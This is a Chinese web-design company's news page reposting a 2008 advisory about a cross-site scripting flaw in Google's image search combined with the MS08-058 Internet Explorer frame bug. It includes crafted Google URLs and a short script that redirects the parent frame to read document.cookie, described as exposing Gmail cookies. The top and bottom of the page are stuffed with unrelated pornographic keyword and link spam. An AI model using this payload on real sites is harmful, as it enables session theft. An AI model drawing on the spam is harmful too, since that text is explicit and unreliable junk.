国产一区二区白浆,国产真人作爱免费视频道歉,成人精品久久免费,啪啪啪动态图在线,成人亚洲91,边做饭边被躁bd苍井空图片 ,久久久国产精品成人一区二区三区,97自拍小视频
                深一集團(tuán)40%的客戶來自外地,80%的業(yè)務(wù)來自搜索引擎和良好口碑!
                微信 微信人工客服  |
                微信人工客服
                QQ在線溝通

                新聞中心

                全國業(yè)務(wù)咨詢請致電

                0755-27612861

                為您打響品牌第一炮
                • 在線QQ
                • 在線客服
                • 在線留言
                跨站腳本漏洞,利用MS08-058攻擊Google
                發(fā)布日期:2008-10-22   關(guān)鍵詞:觀蘭網(wǎng)站建設(shè)★觀蘭網(wǎng)頁設(shè)計(jì)◆觀瀾網(wǎng)站制作   已有 8405 人瀏覽
                國內(nèi)安全組織80sec近日發(fā)現(xiàn),Google提供的圖片搜索服務(wù)存在安全問題,結(jié)合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務(wù)和獲得目標(biāo)用戶的認(rèn)證信息。

                漏洞說明:Google是全球最大的搜索引擎。同時Google擁有其他龐大的WEB應(yīng)用程序產(chǎn)品線,涉及EMAIL、BLOG、在線文檔、個人主頁、電子地圖、論壇、RSS等互聯(lián)網(wǎng)幾乎所有的應(yīng)用業(yè)務(wù)。80sec發(fā)現(xiàn)Google提供的圖片搜索服務(wù)存在安全問題,結(jié)合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務(wù)和獲得目標(biāo)用戶的認(rèn)證信息。

                漏洞站點(diǎn):http://www.google.com

                漏洞解析:Google提供的圖片搜索服務(wù)存在網(wǎng)頁框架安全問題,惡意攻擊者可以指定網(wǎng)頁的內(nèi)嵌框架頁指向任意網(wǎng)頁。該服務(wù)提供的URL地址主域名可以更改成Google的其他業(yè)務(wù)的子域名,從而造成嚴(yán)重的釣魚網(wǎng)頁攻擊隱患。如下:黑客指定imgrefurl參數(shù)就可能構(gòu)造GMAIL相關(guān)服務(wù)的釣魚網(wǎng)頁。

                http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com

                該漏洞結(jié)合由80SEC團(tuán)隊(duì)成員發(fā)現(xiàn)的IE瀏覽器的MS08-058部分漏洞可以造成GOOGLE整站的跨站腳本XSS漏洞,linx在《利用IE 框架跨域》文檔分析了MS08-058涉及網(wǎng)頁框架安全問題,子框架網(wǎng)頁可以操作主框架的窗口句柄。這種類型的漏洞主要危害是不受IE瀏覽器同源策略的限制,可以跨域控制其他域的網(wǎng)頁,影響所有的WEB應(yīng)用。微軟已經(jīng)在08年10月提供了MS08-058補(bǔ)丁修復(fù)了該漏洞。

                測試代碼:

                將Google的漏洞頁指向MS08-058漏洞攻擊頁

                http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com

                MS08-058.htm內(nèi)容


                <script>
                setTimeout (
                function(){
                parent.location.href = new String("javascript:alert(document.cookie)");
                }
                ,1500);
                </script>

                即可獲得GAMIL的Cookie信息

                危害提醒:

                黑客利用瀏覽器漏洞可以使這種類型的低風(fēng)險Web安全漏洞擴(kuò)大成影響所有Web應(yīng)用的高風(fēng)險安全問題,請各大網(wǎng)站及安全管理人員仔細(xì)分析評估MS08-058類型的Web安全問題。

                注:本文來自深一集團(tuán)原創(chuàng)或轉(zhuǎn)截 http://www.fpweiyh.cn/newslist_462_2.html 如需轉(zhuǎn)載,請注明出處!
                0
                深一網(wǎng)絡(luò)公司專注設(shè)計(jì)14年
                全國網(wǎng)站建設(shè)
                深一云服務(wù)器深一云服務(wù)器
                高性能,高安全
                網(wǎng)絡(luò)公司拒絕不當(dāng)利
                崇尚野蠻生長
                500強(qiáng)企業(yè)網(wǎng)500強(qiáng)企業(yè)網(wǎng)
                站建設(shè)供應(yīng)商
                10000家客戶案例10000家客戶案
                實(shí)力說服力
                83位技術(shù)團(tuán)隊(duì)83位技術(shù)團(tuán)隊(duì)
                服務(wù)高保障
                深一只做有排名網(wǎng)站只做有排名
                有價值的網(wǎng)站
                200人服務(wù)團(tuán)隊(duì)200人服務(wù)團(tuán)隊(duì)
                追求客戶滿意
                主站蜘蛛池模板: 捆绑白丝粉色jk震动捧喷白浆| 丰满熟妇乱又伦在线无码视频| 国产午夜精华2020在线| 国产精品自在在线午夜免费| 亚洲欧美自拍制服另类图区| 九九热精彩视频在线免费| 国产偷抇久久精品a片69麻豆| 野外做受三级视频| 国产精品鲁鲁鲁| 国产成人综合久久免费导航| 日韩精品一卡二卡三卡在线| 一二三四在线视频观看社区| 亚州日本乱码一区二区三区| 女同AV在线播放| 国产精品国产三级国产专区53| 亚洲国产美女精品久久久| 成人网站在线进入爽爽爽| 国产日产欧产精品推荐| 国产成人人综合亚洲欧美丁香花| 娇妻玩4p被三个男人伺候电影| 人妻少妇乱孑伦无码专区蜜柚| 亚洲日韩av无码| 国产av一二三无码影片 | 成人乱码一区二区三区四区| 欧美大浪妇猛交饥渴大叫| 中文无遮挡h肉视频在线观看| Y111111国产精品久久久| 亚洲性啪啪无码av天堂| 午夜好爽好舒服免费视频| 久久夜色精品亚洲国产av| 亚洲成av人片天堂网| 最近中文字幕完整版2019| 国产精品成人免费视频网站| 精品av一区二区三区不卡| 国产精品入口中文字幕| 精品无码av一区二区三区不卡| 国产精品久人妻精品老妇| 一区二区三区午夜福利院| 国产性色av免费观看| 久久综合综合久久av在钱| 成年女人片免费视频播放A|